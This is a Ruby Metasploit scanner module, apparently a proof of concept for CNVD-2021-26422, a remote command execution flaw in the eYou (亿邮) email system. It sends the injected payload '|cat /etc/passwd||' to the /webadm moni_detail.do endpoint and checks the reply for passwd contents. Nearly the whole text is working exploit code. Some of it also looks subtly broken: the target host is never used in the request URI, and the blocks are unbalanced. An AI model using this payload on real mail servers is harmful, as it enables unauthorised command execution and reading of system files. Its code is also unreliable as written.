# CNVD-2021-26422亿邮电子邮件系统远程命令执行漏洞

require "open-uri"  
require 'net/https'
require 'json'

class MetasploitModule < Msf::Auxiliary
    include Msf::Auxiliary::Scanner
    include Msf::Auxiliary::Report
    include Msf::Exploit::Remote::HttpClient
   
    def initialize
      super(
        'Name'           => 'CNVD_2021_26422_PoC',
        'Description'    => 'This module is used to scan the target site for CNVD_2021_26422.',
        'Author'         => 'H.Mount',
        'License'        => MSF_LICENSE
      )
      deregister_options('SSL','VHOST','Proxies','RPORT')
      register_options(
        [
          OptString.new('RHOSTS', [true, 'The target HOST.Need not to set', '192.168.1.1']),
          OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
        ]) 
    
    end 
    
    def run_host(ip)
  
      uri = datastore['TARGETURI'] + '/webadm/?q=moni_detail.do&action=gragh'  
      # params={}
      # params["type"] = '|cat /etc/passwd||'
      params= "type='|cat /etc/passwd||'"


      begin
        # res = Net::HTTP.post_form(uri, params) 
        res = Net::HTTP.post(uri,params,"Content-Type"=>"application/x-www-form-urlencoded") 

    
        if res.body["root:x:0:0"] 
            print_warning("The CNVD_2021_26422 vulnerability seems to exist at the target site!The 'cat /etc/passwd' command is running...")
        else
            print_good("The CNVD_2021_26422 vulnerability was not detected at the target site.")
        end
    
      rescue => ex
        if ex.message['404']
          print_good('The CNVD_2021_26422 vulnerability was not detected at the target site.')
        else
          print_error('Some errors occurred...')
          print_error(ex.message)
        end
      end
  end